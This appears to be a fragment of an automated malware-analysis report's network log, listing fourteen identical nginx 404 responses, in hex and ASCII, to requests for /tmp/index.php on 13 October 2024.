    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:27:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:02 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:12 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 16:28:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
